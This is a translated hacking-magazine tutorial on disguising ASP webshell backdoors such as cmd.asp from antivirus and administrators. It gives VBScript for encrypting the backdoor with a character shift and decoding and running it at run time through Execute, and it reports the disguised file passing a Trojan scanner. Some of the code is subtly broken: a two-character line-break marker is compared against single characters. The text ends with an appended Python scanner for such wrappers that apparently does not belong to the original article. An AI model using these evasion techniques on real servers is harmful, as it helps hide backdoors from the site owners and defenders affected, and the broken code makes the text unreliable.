The ultimate disguise for an ASP backdoor

Source: Internet
Author: User
Remember when ASP Trojans were known as the so-called "Trojans that can never be killed"? Today any antivirus software can kill them ^_^. Borrowing the idea that Trojans use to avoid antivirus software, we can also give an ASP Trojan a "shell" (not with UPX and the like, of course). What are you waiting for? Read on.

In fact, the idea is very simple: encode the ASP code and decode it when it is executed. There are two methods: one uses Microsoft's Script Encoder tool, and the other takes advantage of ASP's Execute function.


Let's talk about Script Encoder first. It can be downloaded free from Microsoft's official website, which also gives detailed usage instructions, so I won't say more here. But a file it has encrypted will contain <%@ LANGUAGE = VBScript.Encode %>, so an administrator who sees this line knows the ASP file is encrypted. How is it decrypted? A decryption tool is provided here ("click to download"). So now we know Microsoft's Script Encoder is not safe, and we have to write our own program to produce the "shell".


ASP's Execute function executes a string, which means an ASP statement can be written as a string and run with Execute. For example, the line Execute("Response.Write(""HackerXfiles"")") has the same effect as executing Response.Write("HackerXfiles"). Because what is inside the Execute call is a string, quotation marks inside it have to be doubled. And since Execute takes a string, we can encrypt what goes inside it.

How do you encrypt it? Just use the simplest shift method. Here is the code:


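but = 1                              ' number of positions to shift
' nr holds the ASP source text to encode (assigned elsewhere; not shown here)
cc = Replace(nr, vbCrLf, "Hu")       ' replace line breaks with a marker first
' Note: the test below compares one character at a time, so the marker has to
' be a single character to match; "Hu" is how this translated page renders it.
For i = 1 To Len(cc)
    If Mid(cc, i, 1) <> "Hu" Then
        pk = Asc(Mid(cc, i, 1)) + but
        If pk > 126 Then
            pk = pk - 95             ' wrap around to stay within 32..126
        ElseIf pk < 32 Then
            pk = pk + 95
        End If
        temp = temp & Chr(pk)
    Else
        temp = temp & "Hu"           ' keep the line-break marker unshifted
    End If
Next
temp = Replace(temp, """", """""")   ' double the quotes for use in a string literal
Response.Write(temp)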

This code is the cyclic shift method in ASP. The variable but is the number of positions to shift, and it can be changed. Why is it called cyclic? Because the program checks each character's ASCII code and wraps it around when it is greater than 126 or less than 32, so the range stays 32~126. This prevents characters that Windows cannot display from appearing. This is also the reason the carriage return/line feed is replaced at the start. I have written an ASP program, xor.asp, that does this shift encryption and attached it; I hope it helps you.

Now let's look at the result of encrypting Response.Write("HackerXfiles") with the code above: Sftqpotf/Xsjuf)#IbdlfsYgjmft#*. This time even an immortal couldn't make sense of it ^_^

Since it has been encrypted, it of course has to be decrypted. Here is the decryption code:

Function Unencode(temp)
    but = 1   ' number of positions shifted; must match the value used when encrypting
    ' As in the encoder, "Hu" stands for the single-character line-break marker.
    For i = 1 To Len(temp)
        If Mid(temp, i, 1) <> "Hu" Then
            pk = Asc(Mid(temp, i, 1)) - but
            If pk > 126 Then
                pk = pk - 95
            ElseIf pk < 32 Then
                pk = pk + 95         ' wrap around to stay within 32..126
            End If
            a = a & Chr(pk)
        Else
            a = a & vbCrLf           ' restore the line break
        End If
    Next
    Unencode = a
End Function

Now you know how to execute it: just call this decryption function, as in Execute(Unencode("Sftqpotf/Xsjuf)#IbdlfsYgjmft#*")). See, it executes smoothly!

Here is a demonstration, so that everyone can understand how an ASP Trojan is encrypted. Because the Sea ASP Trojan has too much code and I am lazy, I'll use the compact cmd.asp for the demonstration.

First run the xor.asp I wrote, then open cmd.asp with Notepad and copy its ASP code into the xor.asp text box (see picture).



Fill in the shift parameter (here I use 1) and click "conversion", and the result comes out. Then create a new text document, copy the contents of cmd.asp into it, and add the Unencode function at the front (note that the value of the variable but in the Unencode function must be the same as the shift parameter chosen when encrypting). Then replace the ASP portion with Execute(Unencode(hu)), where hu is assigned the encrypted result obtained in the previous step. Then save it as an ASP file and that's it. A few more words: if the code is long, it can be encrypted in several pieces and executed with several Execute calls, but the integrity of the ASP code has to be preserved, that is, paired statements such as If and End If cannot be split across two Execute calls.

Look, it still runs!



The issue 8 CD-ROM includes the "Think Easy" ASP Trojan hunter, which is just handy for checking today's result. Look at the results: it detects both the original cmd.asp and the Sea Top Net 2005 version encoded with Script Encoder, but it detects nothing in the xcmd.asp we just crafted!
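A scanner can still catch this wrapper, because the file has to call Execute on a function's return value and has to carry the shifted text as a string literal. The following is an added example, not code from the original article; the keyword list, function names and sample file are assumptions constructed for illustration. It flags the Script Encoder marker, Execute of a function result, and any literal that decodes to ASP code under one of the 94 possible shifts.

```python
import re

# Assumed keyword list: ASP calls worth flagging when found hidden in a literal.
KEYWORDS = ("response.write", "server.createobject", "wscript.shell", "request(")
LITERAL = re.compile(r'"((?:[^"\r\n]|"")*)"')          # VBScript string literal
DYN_EXEC = re.compile(r'\b(ExecuteGlobal|Execute|Eval)\b\s*\(?\s*(\w+)\s*\(', re.I)
ENC_MARK = re.compile(r'LANGUAGE\s*=\s*"?VBScript\.Encode', re.I)

def unshift(text, shift):
    """Undo a cyclic shift over printable ASCII 32..126; other chars pass through."""
    return "".join(
        chr((ord(c) - 32 - shift) % 95 + 32) if 32 <= ord(c) <= 126 else c
        for c in text)

def recover_shifted(literal):
    """Try all 94 non-zero shifts; return (shift, plaintext) if a keyword appears."""
    for shift in range(1, 95):
        plain = unshift(literal, shift)
        if any(k in plain.lower() for k in KEYWORDS):
            return shift, plain
    return None

def scan_asp(source):
    """Return a list of (finding, detail) tuples for one ASP file's text."""
    findings = []
    if ENC_MARK.search(source):
        findings.append(("script-encoder-marker", None))
    for m in DYN_EXEC.finditer(source):
        # Execute(SomeFunction(...)): code is being built at run time
        findings.append(("execute-of-function-result", m.group(2)))
    for m in LITERAL.finditer(source):
        literal = m.group(1).replace('""', '"')        # undo quote doubling
        if len(literal) >= 8:
            hit = recover_shifted(literal)
            if hit:
                findings.append(("shifted-literal", hit))
    return findings

# Constructed sample: the shift-1 encoding of Response.Write("HackerXfiles").
SAMPLE = '''<%
hu = "Sftqpotf/Xsjuf)#IbdlfsYgjmft#*"
Execute(Unencode(hu))
%>'''

if __name__ == "__main__":
    for finding in scan_asp(SAMPLE):
        print(finding)
```

When the code has been split across several Execute calls, each literal is tried separately, and the Execute-of-function-result finding fires regardless of what the literals decode to.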


